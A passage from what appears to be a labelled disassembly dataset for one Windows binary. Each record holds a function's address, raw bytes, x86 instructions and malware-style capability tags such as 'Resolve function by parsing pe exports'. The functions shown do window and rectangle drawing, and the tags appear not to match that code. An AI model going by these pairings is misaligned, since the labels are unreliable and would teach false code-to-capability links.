"pop edi",
"pop esi",
"mov ecx, dword [esp + 0x54]",
"mov dword fs:[0], ecx",
"add esp, 0x60",
"ret 0x14",
"lea ecx, [esp + 8]",
"push ecx",
"mov ecx, esi",
"call fcn.00446430",
"mov edx, eax",
"mov eax, dword [edx]",
"mov ecx, dword [edx + 4]",
"push ecx",
"push eax",
"lea eax, [esp + 0x20]",
"push eax",
"call dword [sym.imp.USER32.dll_OffsetRect]",
"push edi",
"lea ecx, [esp + 0x4c]",
"call fcn.004b3499",
"mov ecx, dword [esi + 0x5c]",
"mov edx, dword [esi + 0x58]",
"push ecx",
"lea eax, [esp + 0x4c]",
"push edx",
"push eax",
"mov dword [esp + 0x70], edi",
"call fcn.0045b020",
"mov edx, dword [esp + 0x5c]",
"add esp, 0xc",
"lea ecx, [esp + 0x18]",
"push 2",
"push ecx",
"push edx",
"call dword [sym.imp.GDI32.dll_LPtoDP]",
"mov ecx, dword [esi + 0x1c]",
"lea eax, [esp + 0x38]",
"push eax",
"push ecx",
"call dword [sym.imp.USER32.dll_GetClientRect]",
"lea edx, [esp + 0x38]",
"lea eax, [esp + 0x18]",
"push edx",
"lea ecx, [esp + 0x2c]",
"push eax",
"push ecx",
"call dword [sym.imp.USER32.dll_IntersectRect]",
"mov esi, dword [esp + 0x6c]",
"mov eax, dword [esp + 0x28]",
"mov ecx, dword [esp + 0x2c]",
"mov edx, esi",
"mov dword [esp + 0x64], 0xffffffff",
"mov dword [edx], eax",
"mov eax, dword [esp + 0x30]",
"mov dword [edx + 4], ecx",
"mov ecx, dword [esp + 0x34]",
"mov dword [edx + 8], eax",
"mov dword [edx + 0xc], ecx",
"lea ecx, [esp + 0x48]",
"call fcn.004b350b",
"mov ecx, dword [esp + 0x5c]",
"mov eax, esi",
"pop edi",
"pop esi",
"mov dword fs:[0], ecx",
"add esp, 0x60",
"ret 0x14"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x446ed0
|
[
"Access peb ldr_data"
] |
6aff6890b14b0064a100000000506489250000000083ec4c5356578bf1e84ed9ffff8bd885db895c240c752d8b44246833c98bd833d233f633ff890b895304897308897b0c5f5e5b8b4c244c64890d0000000083c458c20c00558bcbe8df97ffff8b6c24708bf803fd8bcb897c2428e8bc97ffff8b5424748bce03c28944242c8d44242050e8d6f4ffff8b288d542438528b48048b461c50894c2424ff1538f64b006a008d4c244ce81cc506008b4e5c8b5658518d44244c5250c744247000000000e88940010083c40c8d4c2448518d4c2418e848d0ffff8b4424508d5424386a025250c644247001ff15a8f14b008bcbe8ba96ffff8bd88bc73bc37d26578bcee82ad1ffff50558bcee8e1d2ffff3b4424407f0b478be83bfb7ce28bc3eb0a3bfb7c048bc3eb028bc78d48ff8b4424283bc17e0689442430eb0b3bfb7c028bfb4f897c24308b4c24108b5c241ce81d96ffff8be88b44242c3bc58bf87d2e578bcee8e9cfffff50538bcee8b0d3ffff3b4424447f0f478bd83bfd7ce28b44242c8bcdeb123bfd7c088b44242c8bcdeb068b44242c8bcf493bc17e048bc8eb093bfd7c028bfd8d4fff8b74246c8b7c24288bd6893a8942048b442430894208894a0c8d4c2414e875cfffff8d4c2448c7442464ffffffffe85fc406008b4c245c5d8bc65f5e5b64890d0000000083c458c20c00
|
[
"push 0xffffffffffffffff",
"push 0x4bb190",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x4c",
"push ebx",
"push esi",
"push edi",
"mov esi, ecx",
"call fcn.00444840",
"mov ebx, eax",
"test ebx, ebx",
"mov dword [esp + 0xc], ebx",
"jne 0x446f29",
"mov eax, dword [esp + 0x68]",
"xor ecx, ecx",
"mov ebx, eax",
"xor edx, edx",
"xor esi, esi",
"xor edi, edi",
"mov dword [ebx], ecx",
"mov dword [ebx + 4], edx",
"mov dword [ebx + 8], esi",
"mov dword [ebx + 0xc], edi",
"pop edi",
"pop esi",
"pop ebx",
"mov ecx, dword [esp + 0x4c]",
"mov dword fs:[0], ecx",
"add esp, 0x58",
"ret 0xc",
"push ebp",
"mov ecx, ebx",
"call fcn.00440710",
"mov ebp, dword [esp + 0x70]",
"mov edi, eax",
"add edi, ebp",
"mov ecx, ebx",
"mov dword [esp + 0x28], edi",
"call fcn.00440700",
"mov edx, dword [esp + 0x74]",
"mov ecx, esi",
"add eax, edx",
"mov dword [esp + 0x2c], eax",
"lea eax, [esp + 0x20]",
"push eax",
"call fcn.00446430",
"mov ebp, dword [eax]",
"lea edx, [esp + 0x38]",
"push edx",
"mov ecx, dword [eax + 4]",
"mov eax, dword [esi + 0x1c]",
"push eax",
"mov dword [esp + 0x24], ecx",
"call dword [sym.imp.USER32.dll_GetClientRect]",
"push 0",
"lea ecx, [esp + 0x4c]",
"call fcn.004b3499",
"mov ecx, dword [esi + 0x5c]",
"mov edx, dword [esi + 0x58]",
"push ecx",
"lea eax, [esp + 0x4c]",
"push edx",
"push eax",
"mov dword [esp + 0x70], 0",
"call fcn.0045b020",
"add esp, 0xc",
"lea ecx, [esp + 0x48]",
"push ecx",
"lea ecx, [esp + 0x18]",
"call fcn.00443ff0",
"mov eax, dword [esp + 0x50]",
"lea edx, [esp + 0x38]",
"push 2",
"push edx",
"push eax",
"mov byte [esp + 0x70], 1",
"call dword [sym.imp.GDI32.dll_DPtoLP]",
"mov ecx, ebx",
"call fcn.00440680",
"mov ebx, eax",
"mov eax, edi",
"cmp eax, ebx",
"jge 0x446ff4",
"push edi",
"mov ecx, esi",
"call fcn.00444100",
"push eax",
"push ebp",
"mov ecx, esi",
"call fcn.004442c0",
"cmp eax, dword [esp + 0x40]",
"jg 0x446ff0",
"inc edi",
"mov ebp, eax",
"cmp edi, ebx",
"jl 0x446fce",
"mov eax, ebx",
"jmp 0x446ffa",
"cmp edi, ebx",
"jl 0x446ff8",
"mov eax, ebx",
"jmp 0x446ffa",
"mov eax, edi",
"lea ecx, [eax - 1]",
"mov eax, dword [esp + 0x28]",
"cmp eax, ecx",
"jle 0x44700b",
"mov dword [esp + 0x30], eax",
"jmp 0x447016",
"cmp edi, ebx",
"jl 0x447011",
"mov edi, ebx",
"dec edi",
"mov dword [esp + 0x30], edi",
"mov ecx, dword [esp + 0x10]",
"mov ebx, dword [esp + 0x1c]",
"call fcn.00440640",
"mov ebp, eax",
"mov eax, dword [esp + 0x2c]",
"cmp eax, ebp",
"mov edi, eax",
"jge 0x44705d",
"push edi",
"mov ecx, esi",
"call fcn.00444020",
"push eax",
"push ebx",
"mov ecx, esi",
"call fcn.004443f0",
"cmp eax, dword [esp + 0x44]",
"jg 0x447055",
"inc edi",
"mov ebx, eax",
"cmp edi, ebp",
"jl 0x44702f",
"mov eax, dword [esp + 0x2c]",
"mov ecx, ebp",
"jmp 0x447067",
"cmp edi, ebp",
"jl 0x447061",
"mov eax, dword [esp + 0x2c]",
"mov ecx, ebp",
"jmp 0x447067",
"mov eax, dword [esp + 0x2c]",
"mov ecx, edi",
"dec ecx",
"cmp eax, ecx",
"jle 0x447070",
"mov ecx, eax",
"jmp 0x447079",
"cmp edi, ebp",
"jl 0x447076",
"mov edi, ebp",
"lea ecx, [edi - 1]",
"mov esi, dword [esp + 0x6c]",
"mov edi, dword [esp + 0x28]",
"mov edx, esi",
"mov dword [edx], edi",
"mov dword [edx + 4], eax",
"mov eax, dword [esp + 0x30]",
"mov dword [edx + 8], eax",
"mov dword [edx + 0xc], ecx",
"lea ecx, [esp + 0x14]",
"call fcn.00444010",
"lea ecx, [esp + 0x48]",
"mov dword [esp + 0x64], 0xffffffff",
"call fcn.004b350b",
"mov ecx, dword [esp + 0x5c]",
"pop ebp",
"mov eax, esi",
"pop edi",
"pop esi",
"pop ebx",
"mov dword fs:[0], ecx",
"add esp, 0x58",
"ret 0xc"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x447180
|
[
"Resolve function by parsing pe exports"
] |
64a1000000006aff68c0b14b00506489250000000083ec68535556578bf1e89dd6ffff8bf885ff0f84a10200008bcfe84c95ffff8bd88bcf895c2410e84f95ffff8bbc2488000000894424143bfb0f8c7a0200008bac248c0000003be80f8c6b0200008b9c24940000008b8c24900000008b038b11508d44243452508bcee8cdfcffff8d4c24205051ff159cf54b003b7c24240f8cd10000008b44242c3bf87f183b6c24207c0a3b6c24280f8e1d0200003bf80f8e060100008b461c8d5424305250ff1538f64b006a008d4c2454e846c206008b4e5c8b5658518d4424545250c784248c00000000000000e8b03d010083c40c8d4c2450518d8c248c000000e86ccdffff8b4424588d5424306a025250c684248c00000001ff15a8f14b008b5c243c8b4c24342bd98d4c2418518bcee87cf1ffff8b50048bcef7da5253e82ed1ffff8be88bdf538bcee852cdfffff7d850558bcee817d1ffff8be885ed7c138b4424104b3bd87ddeeb092b7c2410893beb4d433bfb8bcf7c028bcb8b4424103bc17e048bf8eb063bfb7c028bfb2bf88b8424940000008d8c24880000008938e8ecccffff8d4c2450c7842480000000ffffffffe8d3c106008bac248c0000003b6c24207d148b4424148b8c24900000002be88929e9f50000003b6c24280f8eeb0000008b461c8d5424405250ff1538f64b006a008d4c2468e81cc106008b4e5c8b5658518d4424685250c784248c00000002000000e8863c010083c40c8d4c2464518d8c2498000000e842ccffff8b44246c8d5424406a025250c684248c00000003ff15a8f14b008d4c2418518bcee85cf0ffff8b7c24488b5424408b082bfa2bf98bdd538bcee814cdfffff7d850578bcee8c9ceffff8bf885ff7c0b8b4424144b3bd87ddeeb01433beb8bc57c028bc38b4c24143bc87e048bd9eb063beb7d028bdd8b9424900000002bd98d8c2494000000891ae8d6cbffff8d4c2464c7842480000000ffffffffe8bdc006008b4c24785f5e5d5b64890d0000000083c474c21000
|
[
"mov eax, dword fs:[0]",
"push 0xffffffffffffffff",
"push 0x4bb1c0",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x68",
"push ebx",
"push ebp",
"push esi",
"push edi",
"mov esi, ecx",
"call fcn.00444840",
"mov edi, eax",
"test edi, edi",
"je 0x44744e",
"mov ecx, edi",
"call fcn.00440700",
"mov ebx, eax",
"mov ecx, edi",
"mov dword [esp + 0x10], ebx",
"call fcn.00440710",
"mov edi, dword [esp + 0x88]",
"mov dword [esp + 0x14], eax",
"cmp edi, ebx",
"jl 0x44744e",
"mov ebp, dword [esp + 0x8c]",
"cmp ebp, eax",
"jl 0x44744e",
"mov ebx, dword [esp + 0x94]",
"mov ecx, dword [esp + 0x90]",
"mov eax, dword [ebx]",
"mov edx, dword [ecx]",
"push eax",
"lea eax, [esp + 0x34]",
"push edx",
"push eax",
"mov ecx, esi",
"call fcn.00446ed0",
"lea ecx, [esp + 0x20]",
"push eax",
"push ecx",
"call dword [sym.imp.USER32.dll_CopyRect]",
"cmp edi, dword [esp + 0x24]",
"jl 0x4472ea",
"mov eax, dword [esp + 0x2c]",
"cmp edi, eax",
"jg 0x447239",
"cmp ebp, dword [esp + 0x20]",
"jl 0x447231",
"cmp ebp, dword [esp + 0x28]",
"jle 0x44744e",
"cmp edi, eax",
"jle 0x44733f",
"mov eax, dword [esi + 0x1c]",
"lea edx, [esp + 0x30]",
"push edx",
"push eax",
"call dword [sym.imp.USER32.dll_GetClientRect]",
"push 0",
"lea ecx, [esp + 0x54]",
"call fcn.004b3499",
"mov ecx, dword [esi + 0x5c]",
"mov edx, dword [esi + 0x58]",
"push ecx",
"lea eax, [esp + 0x54]",
"push edx",
"push eax",
"mov dword [esp + 0x8c], 0",
"call fcn.0045b020",
"add esp, 0xc",
"lea ecx, [esp + 0x50]",
"push ecx",
"lea ecx, [esp + 0x8c]",
"call fcn.00443ff0",
"mov eax, dword [esp + 0x58]",
"lea edx, [esp + 0x30]",
"push 2",
"push edx",
"push eax",
"mov byte [esp + 0x8c], 1",
"call dword [sym.imp.GDI32.dll_DPtoLP]",
"mov ebx, dword [esp + 0x3c]",
"mov ecx, dword [esp + 0x34]",
"sub ebx, ecx",
"lea ecx, [esp + 0x18]",
"push ecx",
"mov ecx, esi",
"call fcn.00446430",
"mov edx, dword [eax + 4]",
"mov ecx, esi",
"neg edx",
"push edx",
"push ebx",
"call fcn.004443f0",
"mov ebp, eax",
"mov ebx, edi",
"push ebx",
"mov ecx, esi",
"call fcn.00444020",
"neg eax",
"push eax",
"push ebp",
"mov ecx, esi",
"call fcn.004443f0",
"mov ebp, eax",
"test ebp, ebp",
"jl 0x4472f2",
"mov eax, dword [esp + 0x10]",
"dec ebx",
"cmp ebx, eax",
"jge 0x4472c6",
"jmp 0x4472f3",
"sub edi, dword [esp + 0x10]",
"mov dword [ebx], edi",
"jmp 0x44733f",
"inc ebx",
"cmp edi, ebx",
"mov ecx, edi",
"jl 0x4472fb",
"mov ecx, ebx",
"mov eax, dword [esp + 0x10]",
"cmp eax, ecx",
"jle 0x447307",
"mov edi, eax",
"jmp 0x44730d",
"cmp edi, ebx",
"jl 0x44730d",
"mov edi, ebx",
"sub edi, eax",
"mov eax, dword [esp + 0x94]",
"lea ecx, [esp + 0x88]",
"mov dword [eax], edi",
"call fcn.00444010",
"lea ecx, [esp + 0x50]",
"mov dword [esp + 0x80], 0xffffffff",
"call fcn.004b350b",
"mov ebp, dword [esp + 0x8c]",
"cmp ebp, dword [esp + 0x20]",
"jge 0x447359",
"mov eax, dword [esp + 0x14]",
"mov ecx, dword [esp + 0x90]",
"sub ebp, eax",
"mov dword [ecx], ebp",
"jmp 0x44744e",
"cmp ebp, dword [esp + 0x28]",
"jle 0x44744e",
"mov eax, dword [esi + 0x1c]",
"lea edx, [esp + 0x40]",
"push edx",
"push eax",
"call dword [sym.imp.USER32.dll_GetClientRect]",
"push 0",
"lea ecx, [esp + 0x68]",
"call fcn.004b3499",
"mov ecx, dword [esi + 0x5c]",
"mov edx, dword [esi + 0x58]",
"push ecx",
"lea eax, [esp + 0x68]",
"push edx",
"push eax",
"mov dword [esp + 0x8c], 2",
"call fcn.0045b020",
"add esp, 0xc",
"lea ecx, [esp + 0x64]",
"push ecx",
"lea ecx, [esp + 0x98]",
"call fcn.00443ff0",
"mov eax, dword [esp + 0x6c]",
"lea edx, [esp + 0x40]",
"push 2",
"push edx",
"push eax",
"mov byte [esp + 0x8c], 3",
"call dword [sym.imp.GDI32.dll_DPtoLP]",
"lea ecx, [esp + 0x18]",
"push ecx",
"mov ecx, esi",
"call fcn.00446430",
"mov edi, dword [esp + 0x48]",
"mov edx, dword [esp + 0x40]",
"mov ecx, dword [eax]",
"sub edi, edx",
"sub edi, ecx",
"mov ebx, ebp",
"push ebx",
"mov ecx, esi",
"call fcn.00444100",
"neg eax",
"push eax",
"push edi",
"mov ecx, esi",
"call fcn.004442c0",
"mov edi, eax",
"test edi, edi",
"jl 0x447408",
"mov eax, dword [esp + 0x14]",
"dec ebx",
"cmp ebx, eax",
"jge 0x4473e4",
"jmp 0x447409",
"inc ebx",
"cmp ebp, ebx",
"mov eax, ebp",
"jl 0x447411",
"mov eax, ebx",
"mov ecx, dword [esp + 0x14]",
"cmp ecx, eax",
"jle 0x44741d",
"mov ebx, ecx",
"jmp 0x447423",
"cmp ebp, ebx",
"jge 0x447423",
"mov ebx, ebp",
"mov edx, dword [esp + 0x90]",
"sub ebx, ecx",
"lea ecx, [esp + 0x94]",
"mov dword [edx], ebx",
"call fcn.00444010",
"lea ecx, [esp + 0x64]",
"mov dword [esp + 0x80], 0xffffffff",
"call fcn.004b350b",
"mov ecx, dword [esp + 0x78]",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"mov dword fs:[0], ecx",
"add esp, 0x74",
"ret 0x10"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x4477e0
|
[
"Resolve function by parsing pe exports"
] |
6aff6855b24b0064a100000000506489250000000081ecbc0000005355568be957896c2414e836d0ffff85c0894424180f84ea0800008b8424f00000008bb424ec0000008bc88bbc24e800000083e11e33db3bc80f94c385db752856578bcde88c0e000085c0751b8b8424f800000085c00f84a908000050ff1508f54b00e99d0800008d8c2490000000e881afffff8b4c24186a01568d9424980000005752c78424e400000000000000e8918effff83fb015675198bcde864c8ffff578bcd89442424e878c7ffff89442424eb1c8d44245057508bcde8a50b00008bc88b018b490489442420894c24248d8c2490000000e80ab0ffff8bf88d8c24900000008944244483e70fe855b0ffff8b9c24e40000008b5424248b4c2420894424288d041a8b9424e00000008be88b8424f800000003ca8bf385c08954242c89742430894c2434896c2438740b891089700489480889680c8d8c2490000000e8b0afffff8be881fd000000ff75078b5424148b6a408b4424148b486c85c9752e8b7424188bcee8998dffff398424e80000007c108bcee8998dffff398424ec0000007d0a6a0fff15f0f54b00eb028bc5508d8c2488000000e865be06008a8424f00000008bb424dc000000a820c68424d40000000174608b4424348b4c242c8b542430894424548b8424f4000000894c244c8b4c24388954245085c0894c24587411508d5424508d4424505250ff15ccf54b008b8c24880000008d8424840000008b5604f7d81bc023c18d4c244c505152ff1508f64b00f68424f0000000010f84740600008d8c2490000000e883aeffff85c00f85c70200008b442444f6c4070f840b0100008b44241433d28b483c518b486c83f9028d4c24500f95c24a83e203526a00e849bd06008d44244c8bce50c68424d800000002e81cb306008bac24e0000000538d4c244055518bce89442424e8f4b706008b442444f6c401740d8b5424248b44242003d352eb748b442444f6c40474338b4c24248b54242003cb03d551528bcee80cb806008b4424205303c58d4c244050518bcee8acb706008b54242403d35255eb3b8b4424248bce992bc2d1f803c3508b44242403c550e8d4b70600538d4c244055518bcee87ab706008b5424248b44242003d352992bc2d1f803c5508bcee8acb706008b4424188bce50e863b20600c744244c083a4e008d4c244cc68424d400000003e84dbc0600eb078bac24e00000008b4424288d4c242cf7d8505051ff15c4f54b008b15cc625000895424108d4424108d8c249000000050c68424d800000004e866b1ffff8b4c24108b41f885c00f844d010000c744244000000000c744243c68e94d008b4c24148d54243c6a008d8424940000005250c68424e000000005e8a7faffff8b168d44243c508bceff522883ff0289442418bd00080000742083ff05741b83ff08741683ff03740a83ff06740583ff09750cbd02080000eb05bd0108000083ff04741e83ff05741983ff06741483ff07740a83ff08740583ff09750883cd08eb0383cd046a0d8d4c2414e83653060083f8ff752f8b4424108d54244c528b48f851508b460850ff15b8f14b008b4c24348b54242c8b44244c2bca3bc17d0583cd20eb0383cd108b442414f6404408740d8b486c85c9740681cd000100008b3e8d8c2490000000e86bc00000508bceff57306a018bcee8cdb106008b4424108b168d7c242c558b48f85751508bceff52688b4c24188b06518bceff5028c744243c083a4e008d4c243cc68424d400000006e8b9ba06008bac24e00000008d4c2410c68424d400000001e8fd4d0600e9a003000083f801740983f8020f858b0300008d8c2490000000e83aacffff85c0894424180f84730300008b4424288d54242cf7d8505052ff15c4f54b008b4e088d44242c6a025051ff1594f14b008b168bceff521c8b066a018bceff50346a006a006a006a00ff158cf04b008b4e048bd85351899c2494000000ff157cf14b008be8c7442450000000004dc744244cfc474e00f7dd1bed45896c243c8b542414c68424d400000007f642440874098bc28b486c85c975238d4c242c51ff158cf14b00508d4c2450e87db906008d54244c6a01528bcee8adb506008b4c241833c0894424688944246489442474894424788944246c894424708d442464505156e8d43cffff83f8010f853d0200008b6c242c8b4424308b5c24348b4c24382bdd2bc883ff0a896c244889442410895c2418894c24287515682000cc00518bd053528d4424745550e9e501000083ff0d0f84bc00000083ff0e0f84b300000083ff0c0f84aa00000083ff0b0f84a100000083ff02742583ff05742083ff08741b83ff03740a83ff06740583ff09751f2b5c246c03dd895c2448eb138b54246c8bc32bc2992bc2d1f803c58944244883ff04742b83ff05742683ff06742183ff07740a83ff08740583ff0975298b5424708b4424302bca03c8894c2410eb178b5c24708bc18b4c24302bc3992bc2d1f803c1894424108b4c24108b542448682000cc006aff6aff518d4424745250e9200100008b4c24708b6c246c83ff0d894c245c746bdb44246cdd54245cda7c2418db442470dd542418db442428d8f1dd5c247cddd8dc54247cdfe0f6c4017506ddd8dd44247c83ff0b7517dd0590cf4d00d8d9dfe0f6c4017408ddd8dd0590cf4d00dd44245cd8c9e8d7130400dd442418d8c98be8e8ca130400ddd88944245c83ff0c746d83ff0b74688b442428c74424180000000085c00f8e8b0000008b44241833ff85db7e368b54241003c28944247c8b44245c8b5424488b4c247c682000cc005055518d04178d4c24745051e8583dffff03fd3bfb7cd88b4424188b54245c8b4c242803c23bc1894424187cb2eb378b4c245c8b4424288b7c24302bc1992bc2682000cc00d1f85103c755508bc32bc5992bc28b54243cd1f803c28d5424745052e8033dffff8d44246450e85940ffff8b9c248c0000008b6c243c83fd01750d8b4e045351ff150cf14b00eb096a008bcee865b1060053ff151cf14b008b166aff8bceff5220c744244c083a4e008d4c244cc68424d400000008e812b706008b9c24e4000000c68424d4000000018bac24e00000008b4424448b8c24f0000000508b8424f00000008d542424518b8c24f00000005250518b4c2428535556e856000000c7842484000000083a4e008d8c2484000000c68424d400000009e8afb606008d8c2490000000c78424d4000000ffffffffe820a7ffff8b8c24cc0000005f5e5d5b64890d0000000081c4c8000000c22000
|
[
"push 0xffffffffffffffff",
"push 0x4bb255",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0xbc",
"push ebx",
"push ebp",
"push esi",
"mov ebp, ecx",
"push edi",
"mov dword [esp + 0x14], ebp",
"call fcn.00444840",
"test eax, eax",
"mov dword [esp + 0x18], eax",
"je 0x448100",
"mov eax, dword [esp + 0xf0]",
"mov esi, dword [esp + 0xec]",
"mov ecx, eax",
"mov edi, dword [esp + 0xe8]",
"and ecx, 0x1e",
"xor ebx, ebx",
"cmp ecx, eax",
"sete bl",
"test ebx, ebx",
"jne 0x447863",
"push esi",
"push edi",
"mov ecx, ebp",
"call fcn.004486d0",
"test eax, eax",
"jne 0x447863",
"mov eax, dword [esp + 0xf8]",
"test eax, eax",
"je 0x448100",
"push eax",
"call dword [sym.imp.USER32.dll_SetRectEmpty]",
"jmp 0x448100",
"lea ecx, [esp + 0x90]",
"call fcn.004427f0",
"mov ecx, dword [esp + 0x18]",
"push 1",
"push esi",
"lea edx, [esp + 0x98]",
"push edi",
"push edx",
"mov dword [esp + 0xe4], 0",
"call fcn.00440720",
"cmp ebx, 1",
"push esi",
"jne 0x4478ae",
"mov ecx, ebp",
"call fcn.00444100",
"push edi",
"mov ecx, ebp",
"mov dword [esp + 0x24], eax",
"call fcn.00444020",
"mov dword [esp + 0x24], eax",
"jmp 0x4478ca",
"lea eax, [esp + 0x50]",
"push edi",
"push eax",
"mov ecx, ebp",
"call fcn.00448460",
"mov ecx, eax",
"mov eax, dword [ecx]",
"mov ecx, dword [ecx + 4]",
"mov dword [esp + 0x20], eax",
"mov dword [esp + 0x24], ecx",
"lea ecx, [esp + 0x90]",
"call fcn.004428e0",
"mov edi, eax",
"lea ecx, [esp + 0x90]",
"mov dword [esp + 0x44], eax",
"and edi, 0xf",
"call fcn.00442940",
"mov ebx, dword [esp + 0xe4]",
"mov edx, dword [esp + 0x24]",
"mov ecx, dword [esp + 0x20]",
"mov dword [esp + 0x28], eax",
"lea eax, [edx + ebx]",
"mov edx, dword [esp + 0xe0]",
"mov ebp, eax",
"mov eax, dword [esp + 0xf8]",
"add ecx, edx",
"mov esi, ebx",
"test eax, eax",
"mov dword [esp + 0x2c], edx",
"mov dword [esp + 0x30], esi",
"mov dword [esp + 0x34], ecx",
"mov dword [esp + 0x38], ebp",
"je 0x447934",
"mov dword [eax], edx",
"mov dword [eax + 4], esi",
"mov dword [eax + 8], ecx",
"mov dword [eax + 0xc], ebp",
"lea ecx, [esp + 0x90]",
"call fcn.004428f0",
"mov ebp, eax",
"cmp ebp, 0xff000000",
"jne 0x447951",
"mov edx, dword [esp + 0x14]",
"mov ebp, dword [edx + 0x40]",
"mov eax, dword [esp + 0x14]",
"mov ecx, dword [eax + 0x6c]",
"test ecx, ecx",
"jne 0x44798a",
"mov esi, dword [esp + 0x18]",
"mov ecx, esi",
"call fcn.00440700",
"cmp dword [esp + 0xe8], eax",
"jl 0x447980",
"mov ecx, esi",
"call fcn.00440710",
"cmp dword [esp + 0xec], eax",
"jge 0x44798a",
"push 0xf",
"call dword [sym.imp.USER32.dll_GetSysColor]",
"jmp 0x44798c",
"mov eax, ebp",
"push eax",
"lea ecx, [esp + 0x88]",
"call fcn.004b37fe",
"mov al, byte [esp + 0xf0]",
"mov esi, dword [esp + 0xdc]",
"test al, 0x20",
"mov byte [esp + 0xd4], 1",
"je 0x447a13",
"mov eax, dword [esp + 0x34]",
"mov ecx, dword [esp + 0x2c]",
"mov edx, dword [esp + 0x30]",
"mov dword [esp + 0x54], eax",
"mov eax, dword [esp + 0xf4]",
"mov dword [esp + 0x4c], ecx",
"mov ecx, dword [esp + 0x38]",
"mov dword [esp + 0x50], edx",
"test eax, eax",
"mov dword [esp + 0x58], ecx",
"je 0x4479ef",
"push eax",
"lea edx, [esp + 0x50]",
"lea eax, [esp + 0x50]",
"push edx",
"push eax",
"call dword [sym.imp.USER32.dll_IntersectRect]",
"mov ecx, dword [esp + 0x88]",
"lea eax, [esp + 0x84]",
"mov edx, dword [esi + 4]",
"neg eax",
"sbb eax, eax",
"and eax, ecx",
"lea ecx, [esp + 0x4c]",
"push eax",
"push ecx",
"push edx",
"call dword [sym.imp.USER32.dll_FillRect]",
"test byte [esp + 0xf0], 1",
"je 0x448095",
"lea ecx, [esp + 0x90]",
"call fcn.004428b0",
"test eax, eax",
"jne 0x447cfc",
"mov eax, dword [esp + 0x44]",
"test ah, 7",
"je 0x447b4d",
"mov eax, dword [esp + 0x14]",
"xor edx, edx",
"mov ecx, dword [eax + 0x3c]",
"push ecx",
"mov ecx, dword [eax + 0x6c]",
"cmp ecx, 2",
"lea ecx, [esp + 0x50]",
"setne dl",
"dec edx",
"and edx, 3",
"push edx",
"push 0",
"call fcn.004b37ae",
"lea eax, [esp + 0x4c]",
"mov ecx, esi",
"push eax",
"mov byte [esp + 0xd8], 2",
"call fcn.004b2d95",
"mov ebp, dword [esp + 0xe0]",
"push ebx",
"lea ecx, [esp + 0x40]",
"push ebp",
"push ecx",
"mov ecx, esi",
"mov dword [esp + 0x24], eax",
"call fcn.004b3286",
"mov eax, dword [esp + 0x44]",
"test ah, 1",
"je 0x447aa8",
"mov edx, dword [esp + 0x24]",
"mov eax, dword [esp + 0x20]",
"add edx, ebx",
"push edx",
"jmp 0x447b1c",
"mov eax, dword [esp + 0x44]",
"test ah, 4",
"je 0x447ae4",
"mov ecx, dword [esp + 0x24]",
"mov edx, dword [esp + 0x20]",
"add ecx, ebx",
"add edx, ebp",
"push ecx",
"push edx",
"mov ecx, esi",
"call fcn.004b32d2",
"mov eax, dword [esp + 0x20]",
"push ebx",
"add eax, ebp",
"lea ecx, [esp + 0x40]",
"push eax",
"push ecx",
"mov ecx, esi",
"call fcn.004b3286",
"mov edx, dword [esp + 0x24]",
"add edx, ebx",
"push edx",
"push ebp",
"jmp 0x447b1f",
"mov eax, dword [esp + 0x24]",
"mov ecx, esi",
"cdq",
"sub eax, edx",
"sar eax, 1",
"add eax, ebx",
"push eax",
"mov eax, dword [esp + 0x24]",
"add eax, ebp",
"push eax",
"call fcn.004b32d2",
"push ebx",
"lea ecx, [esp + 0x40]",
"push ebp",
"push ecx",
"mov ecx, esi",
"call fcn.004b3286",
"mov edx, dword [esp + 0x24]",
"mov eax, dword [esp + 0x20]",
"add edx, ebx",
"push edx",
"cdq",
"sub eax, edx",
"sar eax, 1",
"add eax, ebp",
"push eax",
"mov ecx, esi",
"call fcn.004b32d2",
"mov eax, dword [esp + 0x18]",
"mov ecx, esi",
"push eax",
"call fcn.004b2d95",
"mov dword [esp + 0x4c], vtable.CGdiObject.0",
"lea ecx, [esp + 0x4c]",
"mov byte [esp + 0xd4], 3",
"call fcn.004b3798",
"jmp 0x447b54",
"mov ebp, dword [esp + 0xe0]",
"mov eax, dword [esp + 0x28]",
"lea ecx, [esp + 0x2c]",
"neg eax",
"push eax",
"push eax",
"push ecx",
"call dword [sym.imp.USER32.dll_InflateRect]",
"mov edx, dword [0x5062cc]",
"mov dword [esp + 0x10], edx",
"lea eax, [esp + 0x10]",
"lea ecx, [esp + 0x90]",
"push eax",
"mov byte [esp + 0xd8], 4",
"call fcn.00442cf0",
"mov ecx, dword [esp + 0x10]",
"mov eax, dword [ecx - 8]",
"test eax, eax",
"je 0x447ce6",
"mov dword [esp + 0x40], 0",
"mov dword [esp + 0x3c], 0x4de968",
"mov ecx, dword [esp + 0x14]",
"lea edx, [esp + 0x3c]",
"push 0",
"lea eax, [esp + 0x94]",
"push edx",
"push eax",
"mov byte [esp + 0xe0], 5",
"call fcn.00447670",
"mov edx, dword [esi]",
"lea eax, [esp + 0x3c]",
"push eax",
"mov ecx, esi",
"call dword [edx + 0x28]",
"cmp edi, 2",
"mov dword [esp + 0x18], eax",
"mov ebp, 0x800",
"je 0x447c03",
"cmp edi, 5",
"je 0x447c03",
"cmp edi, 8",
"je 0x447c03",
"cmp edi, 3",
"je 0x447bfc",
"cmp edi, 6",
"je 0x447bfc",
"cmp edi, 9",
"jne 0x447c08",
"mov ebp, 0x802",
"jmp 0x447c08",
"mov ebp, 0x801",
"cmp edi, 4",
"je 0x447c2b",
"cmp edi, 5",
"je 0x447c2b",
"cmp edi, 6",
"je 0x447c2b",
"cmp edi, 7",
"je 0x447c26",
"cmp edi, 8",
"je 0x447c26",
"cmp edi, 9",
"jne 0x447c2e",
"or ebp, 8",
"jmp 0x447c2e",
"or ebp, 4",
"push 0xd",
"lea ecx, [esp + 0x14]",
"call fcn.004acf6f",
"cmp eax, 0xffffffff",
"jne 0x447c6d",
"mov eax, dword [esp + 0x10]",
"lea edx, [esp + 0x4c]",
"push edx",
"mov ecx, dword [eax - 8]",
"push ecx",
"push eax",
"mov eax, dword [esi + 8]",
"push eax",
"call dword [sym.imp.GDI32.dll_GetTextExtentPoint32A]",
